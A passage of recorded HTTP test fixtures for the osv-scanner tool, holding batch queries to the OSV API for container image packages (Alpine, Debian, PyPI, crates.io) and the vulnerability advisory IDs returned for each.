"Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "apk-tools" }, "version": "2.14.0-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "ca-certificates" }, "version": "20230506-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "libc-dev" }, "version": "0.7.2-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "openssl" }, "version": "3.1.4-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "gcc" }, "version": "13.2.1_git20231014-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "musl" }, "version": "1.2.4_git20230717-r4" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "pax-utils" }, "version": "1.3.7-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "zlib" }, "version": "1.3.1-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/scanning_node_modules_using_yarn_with_some_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2685 body: | { "results": [ {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": 
"2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": 
"2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {} ] } headers: Content-Length: - "2685" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/image/testdata/cassettes/TestCommand_OCIImage_JSONFormat.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 14537 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "PyPI", "name": "django" }, "version": "1.11.29" }, { "package": { "ecosystem": "PyPI", "name": "flask" }, "version": "0.12.2" }, { "package": { "ecosystem": "PyPI", "name": "jinja2" }, "version": "3.1.6" }, { "package": { "ecosystem": "PyPI", "name": "markupsafe" }, "version": "3.0.3" }, { "package": { "ecosystem": "PyPI", "name": "werkzeug" }, "version": "3.1.4" }, { "package": { "ecosystem": "Debian:10", "name": "adduser" }, "version": "3.118" }, { "package": { "ecosystem": "Debian:10", "name": "apt" }, "version": "1.8.2.3" }, { "package": { "ecosystem": "Debian:10", "name": "base-files" }, "version": "10.3+deb10u13" }, { "package": { "ecosystem": "Debian:10", "name": "base-passwd" }, "version": "3.5.46" }, { "package": { "ecosystem": "Debian:10", "name": "bash" }, "version": "5.0-4" }, { "package": { "ecosystem": 
"Debian:10", "name": "util-linux" }, "version": "1:2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "ca-certificates" }, "version": "20200601~deb10u2" }, { "package": { "ecosystem": "PyPI", "name": "certifi" }, "version": "2025.11.12" }, { "package": { "ecosystem": "PyPI", "name": "chardet" }, "version": "3.0.4" }, { "package": { "ecosystem": "PyPI", "name": "click" }, "version": "8.1.8" }, { "package": { "ecosystem": "Debian:10", "name": "coreutils" }, "version": "8.30-3" }, { "package": { "ecosystem": "Debian:10", "name": "dash" }, "version": "0.5.10.2-5" }, { "package": { "ecosystem": "Debian:10", "name": "debconf" }, "version": "1.5.71+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "debian-archive-keyring" }, "version": "2019.1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "debianutils" }, "version": "4.8.6.1" }, { "package": { "ecosystem": "Debian:10", "name": "diffutils" }, "version": "1:3.7-3" }, { "package": { "ecosystem": "Debian:10", "name": "dpkg" }, "version": "1.19.8" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "findutils" }, "version": "4.6.0+git+20190209-2" }, { "package": { "ecosystem": "Debian:10", "name": "gcc-8" }, "version": "8.3.0-6" }, { "package": { "ecosystem": "Debian:10", "name": "gnupg2" }, "version": "2.2.12-1+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "grep" }, "version": "3.3-1" }, { "package": { "ecosystem": "Debian:10", "name": "gzip" }, "version": "1.9-3+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "hostname" }, "version": "3.21" }, { "package": { "ecosystem": "PyPI", "name": "idna" }, "version": "2.7" }, { "package": { "ecosystem": "Debian:10", "name": "init-system-helpers" }, "version": "1.56+nmu1" }, { "package": { "ecosystem": "PyPI", "name": "itsdangerous" 
}, "version": "2.2.0" }, { "package": { "ecosystem": "Debian:10", "name": "acl" }, "version": "2.2.53-4" }, { "package": { "ecosystem": "Debian:10", "name": "apt" }, "version": "1.8.2.3" }, { "package": { "ecosystem": "Debian:10", "name": "attr" }, "version": "1:2.4.48-4" }, { "package": { "ecosystem": "Debian:10", "name": "audit" }, "version": "1:2.8.4-3" }, { "package": { "ecosystem": "Debian:10", "name": "audit" }, "version": "1:2.8.4-3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "bzip2" }, "version": "1.0.6-9.2~deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "glibc" }, "version": "2.28-10+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "glibc" }, "version": "2.28-10+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "libcap-ng" }, "version": "0.7.9-2" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "db5.3" }, "version": "5.3.28+dfsg1-0.5" }, { "package": { "ecosystem": "Debian:10", "name": "cdebconf" }, "version": "0.249" }, { "package": { "ecosystem": "Debian:10", "name": "expat" }, "version": "2.2.6-2+deb10u6" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "libffi" }, "version": "3.2.1-9" }, { "package": { "ecosystem": "Debian:10", "name": "gcc-8" }, "version": "1:8.3.0-6" }, { "package": { "ecosystem": "Debian:10", "name": "libgcrypt20" }, "version": "1.8.4-5+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "gdbm" }, "version": "1.18.1-4" }, { "package": { "ecosystem": "Debian:10", "name": "gmp" }, "version": "2:6.1.2+dfsg-4+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "gnutls28" }, "version": 
"3.6.7-4+deb10u10" }, { "package": { "ecosystem": "Debian:10", "name": "libgpg-error" }, "version": "1.35-1" }, { "package": { "ecosystem": "Debian:10", "name": "nettle" }, "version": "3.4.1-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "libidn2" }, "version": "2.0.5-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "lz4" }, "version": "1.8.3-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "xz-utils" }, "version": "5.2.4-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "nettle" }, "version": "3.4.1-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "p11-kit" }, "version": "0.23.15-2+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pcre3" }, "version": "2:8.39-12" }, { "package": { "ecosystem": "Debian:10", "name": "readline" }, "version": "7.0-5" }, { "package": { "ecosystem": "Debian:10", "name": "libseccomp" }, "version": "2.3.3-4" }, { "package": { "ecosystem": "Debian:10", "name": "libselinux" }, "version": "2.8-1+b1" }, { "package": { "ecosystem": "Debian:10", "name": "libsemanage" }, "version": "2.8-2" }, { "package": { "ecosystem": "Debian:10", "name": "libsemanage" }, "version": "2.8-2" }, { "package": { "ecosystem": "Debian:10", "name": "libsepol" }, "version": "2.8-1" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "sqlite3" }, "version": "3.27.2-3+deb10u2" }, { 
"package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "openssl" }, "version": "1.1.1n-0+deb10u5" }, { "package": { "ecosystem": "Debian:10", "name": "gcc-8" }, "version": "8.3.0-6" }, { "package": { "ecosystem": "Debian:10", "name": "systemd" }, "version": "241-7~deb10u9" }, { "package": { "ecosystem": "Debian:10", "name": "libtasn1-6" }, "version": "4.13-3+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "systemd" }, "version": "241-7~deb10u9" }, { "package": { "ecosystem": "Debian:10", "name": "libunistring" }, "version": "0.9.10-1" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "libzstd" }, "version": "1.3.8+dfsg-3+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "shadow" }, "version": "1:4.5-1.1" }, { "package": { "ecosystem": "Debian:10", "name": "mawk" }, "version": "1.3.3-17+b3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "netbase" }, "version": "5.6" }, { "package": { "ecosystem": "Debian:10", "name": "openssl" }, "version": "1.1.1n-0+deb10u5" }, { "package": { "ecosystem": "Debian:10", "name": "shadow" }, "version": "1:4.5-1.1" }, { "package": { "ecosystem": "Debian:10", "name": "perl" }, "version": "5.28.1-6+deb10u1" }, { "package": { "ecosystem": "PyPI", "name": "pip" }, "version": "23.0.1" }, { "package": { "ecosystem": "PyPI", "name": "pip" }, "version": "23.0.1" }, { "package": { "ecosystem": "PyPI", "name": "pytz" }, "version": "2025.2" }, { 
"package": { "ecosystem": "Debian:10", "name": "readline" }, "version": "7.0-5" }, { "package": { "ecosystem": "PyPI", "name": "requests" }, "version": "2.20.0" }, { "package": { "ecosystem": "Debian:10", "name": "sed" }, "version": "4.7-1" }, { "package": { "ecosystem": "PyPI", "name": "setuptools" }, "version": "58.1.0" }, { "package": { "ecosystem": "PyPI", "name": "setuptools" }, "version": "58.1.0" }, { "package": { "ecosystem": "Debian:10", "name": "sysvinit" }, "version": "2.93-8" }, { "package": { "ecosystem": "Debian:10", "name": "tar" }, "version": "1.30+dfsg-6" }, { "package": { "ecosystem": "Debian:10", "name": "tzdata" }, "version": "2021a-0+deb10u11" }, { "package": { "ecosystem": "PyPI", "name": "urllib3" }, "version": "1.24.3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "PyPI", "name": "wheel" }, "version": "0.40.0" }, { "package": { "ecosystem": "Debian:10", "name": "zlib" }, "version": "1:1.2.11.dfsg-1+deb10u2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage_JSONFormat/Scanning_python_image_with_some_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 6240 body: | { "results": [ { "vulns": [ { "id": "GHSA-68w8-qjq3-2gfm", "modified": "2024-09-20T15:46:52.557962Z" }, { "id": "GHSA-6w2r-r2m5-xq5w", "modified": "2026-02-04T04:00:06.061990Z" }, { "id": "GHSA-7xr5-9hcq-chf9", "modified": "2026-02-04T03:48:05.224740Z" }, { "id": "GHSA-8x94-hmjh-97hq", "modified": "2026-02-04T02:45:55.690257Z" }, { "id": "GHSA-frmv-pr5f-9mcr", "modified": "2025-11-27T09:10:30.649595Z" }, { "id": "GHSA-qw25-v68c-qjf3", "modified": "2026-02-04T04:08:30.303132Z" }, { "id": "GHSA-rrqc-c2jx-6jgv", "modified": "2024-10-30T19:23:59.139649Z" }, { "id": "PYSEC-2021-98", "modified": "2023-12-06T01:01:16.755410Z" } ] }, { "vulns": [ { "id": "GHSA-562c-5r94-xh97", "modified": 
"2025-02-21T05:29:40.872529Z" }, { "id": "GHSA-5wv5-4vpf-pj6m", "modified": "2024-09-20T21:24:25.140560Z" }, { "id": "GHSA-68rp-wp8r-4726", "modified": "2026-02-23T23:43:45.778179Z" }, { "id": "GHSA-m2qf-hxjv-5gpq", "modified": "2025-02-21T05:42:17.337040Z" }, { "id": "PYSEC-2018-66", "modified": "2023-11-08T03:59:39.887416Z" }, { "id": "PYSEC-2019-179", "modified": "2023-11-08T04:00:40.602062Z" }, { "id": "PYSEC-2023-62", "modified": "2023-11-08T04:12:28.231927Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-29vq-49wr-vm6x", "modified": "2026-02-23T23:43:27.690386Z" }, { "id": "GHSA-87hc-h4r5-73f7", "modified": "2026-02-04T03:18:07.993642Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3482-1", "modified": "2025-05-26T07:01:25.263124Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-jjg7-2v4v-x38h", "modified": "2026-02-04T03:49:45.087439Z" }, { "id": "PYSEC-2024-60", "modified": "2024-07-11T17:42:33.704488Z" } ] }, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, { "vulns": [ { "id": "DLA-3807-1", "modified": "2026-03-09T01:21:14.798998Z" }, { "id": "DLA-3850-1", "modified": "2026-03-09T01:19:52.798152Z" } ] }, { "vulns": [ { "id": "DLA-3807-1", "modified": "2026-03-09T01:21:14.798998Z" }, { "id": "DLA-3850-1", "modified": "2026-03-09T01:19:52.798152Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3783-1", "modified": "2026-03-09T01:21:52.762023Z" } ] }, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3660-1", "modified": "2026-03-09T02:10:14.556560Z" }, { "id": "DLA-3740-1", "modified": "2026-03-09T01:23:17.775568Z" } ] }, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, { "vulns": [ { "id": "DLA-3586-1", 
"modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, { "vulns": [ { "id": "DLA-3530-1", "modified": "2026-03-09T01:19:28.929204Z" } ] }, {}, { "vulns": [ { "id": "DLA-3474-1", "modified": "2026-03-09T01:20:13.950328Z" } ] }, {}, { "vulns": [ { "id": "DLA-3586-1", "modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, { "vulns": [ { "id": "DLA-3474-1", "modified": "2026-03-09T01:20:13.950328Z" } ] }, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, { "vulns": [ { "id": "DLA-3586-1", "modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, { "vulns": [ { "id": "DLA-3586-1", "modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, {}, { "vulns": [ { "id": "DLA-3530-1", "modified": "2026-03-09T01:19:28.929204Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-4xh5-x5gv-qwph", "modified": "2026-02-04T03:47:34.542520Z" }, { "id": "GHSA-6vgw-5pg2-w6jp", "modified": "2026-02-16T17:11:10.097207Z" }, { "id": "GHSA-mq26-g339-26xf", "modified": "2026-02-04T02:57:26.696931Z" }, { "id": "PYSEC-2023-228", "modified": "2023-12-06T01:03:17.199012Z" } ] }, { "vulns": [ { "id": "GHSA-4xh5-x5gv-qwph", "modified": "2026-02-04T03:47:34.542520Z" }, { "id": "GHSA-6vgw-5pg2-w6jp", "modified": "2026-02-16T17:11:10.097207Z" }, { "id": "GHSA-mq26-g339-26xf", "modified": "2026-02-04T02:57:26.696931Z" }, { "id": "PYSEC-2023-228", "modified": "2023-12-06T01:03:17.199012Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-9hjg-9r4m-mvj7", "modified": "2026-02-04T03:44:00.676479Z" }, { "id": 
"GHSA-9wx4-h78v-vm56", "modified": "2026-02-04T02:43:42.271895Z" }, { "id": "GHSA-j8r2-6x86-q33q", "modified": "2026-02-04T03:34:13.807518Z" }, { "id": "PYSEC-2023-74", "modified": "2023-11-08T04:12:35.436175Z" } ] }, {}, { "vulns": [ { "id": "GHSA-5rjg-fvgr-3xxf", "modified": "2026-02-05T09:18:37.263234Z" }, { "id": "GHSA-cx63-2mw6-8hw5", "modified": "2026-02-04T03:54:02.259111Z" }, { "id": "GHSA-r9hx-vwmv-q579", "modified": "2026-02-04T03:03:25.892107Z" }, { "id": "PYSEC-2022-43012", "modified": "2023-12-06T01:02:35.662444Z" }, { "id": "PYSEC-2025-49", "modified": "2025-06-13T06:59:23.470501Z" } ] }, { "vulns": [ { "id": "GHSA-5rjg-fvgr-3xxf", "modified": "2026-02-05T09:18:37.263234Z" }, { "id": "GHSA-cx63-2mw6-8hw5", "modified": "2026-02-04T03:54:02.259111Z" }, { "id": "GHSA-r9hx-vwmv-q579", "modified": "2026-02-04T03:03:25.892107Z" }, { "id": "PYSEC-2022-43012", "modified": "2023-12-06T01:02:35.662444Z" }, { "id": "PYSEC-2025-49", "modified": "2025-06-13T06:59:23.470501Z" } ] }, {}, { "vulns": [ { "id": "DLA-3755-1", "modified": "2026-03-09T01:18:04.185679Z" } ] }, { "vulns": [ { "id": "DLA-3684-1", "modified": "2025-05-26T07:01:38.953691Z" }, { "id": "DLA-3788-1", "modified": "2025-05-26T07:01:46.700929Z" } ] }, { "vulns": [ { "id": "GHSA-2xpw-w6gg-jr37", "modified": "2026-02-04T02:36:12.983430Z" }, { "id": "GHSA-34jh-p97f-mpxf", "modified": "2026-02-04T03:37:44.850742Z" }, { "id": "GHSA-38jv-5279-wg99", "modified": "2026-02-04T03:51:36.162029Z" }, { "id": "GHSA-g4mx-q9vg-27p4", "modified": "2026-02-04T03:30:16.767903Z" }, { "id": "GHSA-gm62-xv2j-4w53", "modified": "2026-02-04T03:37:15.919661Z" }, { "id": "GHSA-pq67-6m6q-mj2v", "modified": "2026-02-04T04:38:01.163387Z" }, { "id": "GHSA-v845-jxx5-vc9f", "modified": "2026-02-04T02:58:30.152562Z" }, { "id": "GHSA-wqvq-5m8c-6g24", "modified": "2024-11-18T22:47:07.792720Z" }, { "id": "PYSEC-2020-148", "modified": "2023-11-08T04:03:14.251187Z" }, { "id": "PYSEC-2021-108", "modified": "2023-11-08T04:06:04.829992Z" }, 
{ "id": "PYSEC-2023-192", "modified": "2023-11-08T04:13:33.452167Z" }, { "id": "PYSEC-2023-212", "modified": "2023-11-08T04:13:39.165450Z" } ] }, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, { "vulns": [ { "id": "GHSA-8rrh-rw8j-w5fx", "modified": "2026-02-04T03:06:55.268134Z" } ] }, {} ] } headers: Content-Length: - "6240" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 6488 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.22", "name": "alpine-baselayout" }, "version": "3.7.0-r0" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "alpine-baselayout" }, "version": "3.7.0-r0" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "alpine-keys" }, "version": "2.5-r0" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "alpine-base" }, "version": "3.22.2-r0" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "apk-tools" }, "version": "2.14.9-r3" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "busybox" }, "version": "1.37.0-r19" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "busybox" }, "version": "1.37.0-r19" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "ca-certificates" }, "version": "20250911-r0" }, { "package": { "ecosystem": "crates.io", "name": "displaydoc" }, "version": "0.2.5" }, { "package": { "ecosystem": "crates.io", "name": "form_urlencoded" }, "version": "1.2.2" }, { "package": { "ecosystem": "crates.io", "name": "icu_collections" }, "version": "2.1.1" }, { "package": { "ecosystem": "crates.io", "name": "icu_locale_core" }, "version": "2.1.1" }, { "package": { "ecosystem": "crates.io", "name": "icu_normalizer" }, "version": "2.1.1" }, { "package": { "ecosystem": "crates.io", "name": "icu_normalizer_data" }, "version": "2.1.1" }, { "package": { "ecosystem": "crates.io", "name": "icu_properties" }, "version": "2.1.1" }, { "package": { "ecosystem": 
"crates.io", "name": "icu_properties_data" }, "version": "2.1.1" }, { "package": { "ecosystem": "crates.io", "name": "icu_provider" }, "version": "2.1.1" }, { "package": { "ecosystem": "crates.io", "name": "idna" }, "version": "1.1.0" }, { "package": { "ecosystem": "crates.io", "name": "idna_adapter" }, "version": "1.2.1" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "apk-tools" }, "version": "2.14.9-r3" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "openssl" }, "version": "3.5.4-r0" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "openssl" }, "version": "3.5.4-r0" }, { "package": { "ecosystem": "crates.io", "name": "litemap" }, "version": "0.8.1" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "musl" }, "version": "1.2.5-r10" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "musl" }, "version": "1.2.5-r10" }, { "package": { "ecosystem": "crates.io", "name": "percent-encoding" }, "version": "2.3.2" }, { "package": { "ecosystem": "crates.io", "name": "potential_utf" }, "version": "0.1.4" }, { "package": { "ecosystem": "crates.io", "name": "proc-macro2" }, "version": "1.0.103" }, { "package": { "ecosystem": "crates.io", "name": "quote" }, "version": "1.0.42" }, { "package": { "ecosystem": "crates.io", "name": "rust_novuln_deprecated" }, "version": "0.1.0" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "pax-utils" }, "version": "1.3.8-r1" }, { "package": { "ecosystem": "crates.io", "name": "smallvec" }, "version": "1.15.1" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "busybox" }, "version": "1.37.0-r19" }, { "package": { "ecosystem": "crates.io", "name": "stable_deref_trait" }, "version": "1.2.1" }, { "package": { "ecosystem": "crates.io", "name": "syn" }, "version": "2.0.111" }, { "package": { "ecosystem": "crates.io", "name": "synstructure" }, "version": "0.13.2" }, { "package": { "ecosystem": "crates.io", "name": "tinystr" }, "version": "0.8.2" }, { "package": { "ecosystem": "crates.io", "name": 
"unicode-ident" }, "version": "1.0.22" }, { "package": { "ecosystem": "crates.io", "name": "url" }, "version": "2.5.3" }, { "package": { "ecosystem": "crates.io", "name": "utf8_iter" }, "version": "1.0.4" }, { "package": { "ecosystem": "crates.io", "name": "writeable" }, "version": "0.6.2" }, { "package": { "ecosystem": "crates.io", "name": "yoke" }, "version": "0.8.1" }, { "package": { "ecosystem": "crates.io", "name": "yoke-derive" }, "version": "0.8.1" }, { "package": { "ecosystem": "crates.io", "name": "zerofrom" }, "version": "0.1.6" }, { "package": { "ecosystem": "crates.io", "name": "zerofrom-derive" }, "version": "0.1.6" }, { "package": { "ecosystem": "crates.io", "name": "zerotrie" }, "version": "0.2.3" }, { "package": { "ecosystem": "crates.io", "name": "zerovec" }, "version": "0.11.5" }, { "package": { "ecosystem": "crates.io", "name": "zerovec-derive" }, "version": "0.11.2" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "zlib" }, "version": "1.3.1-r2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage_JSONFormat/scanning_image_with_deprecated_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2365 body: | { "results": [ {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, {}, {}, {}, {}, {}, 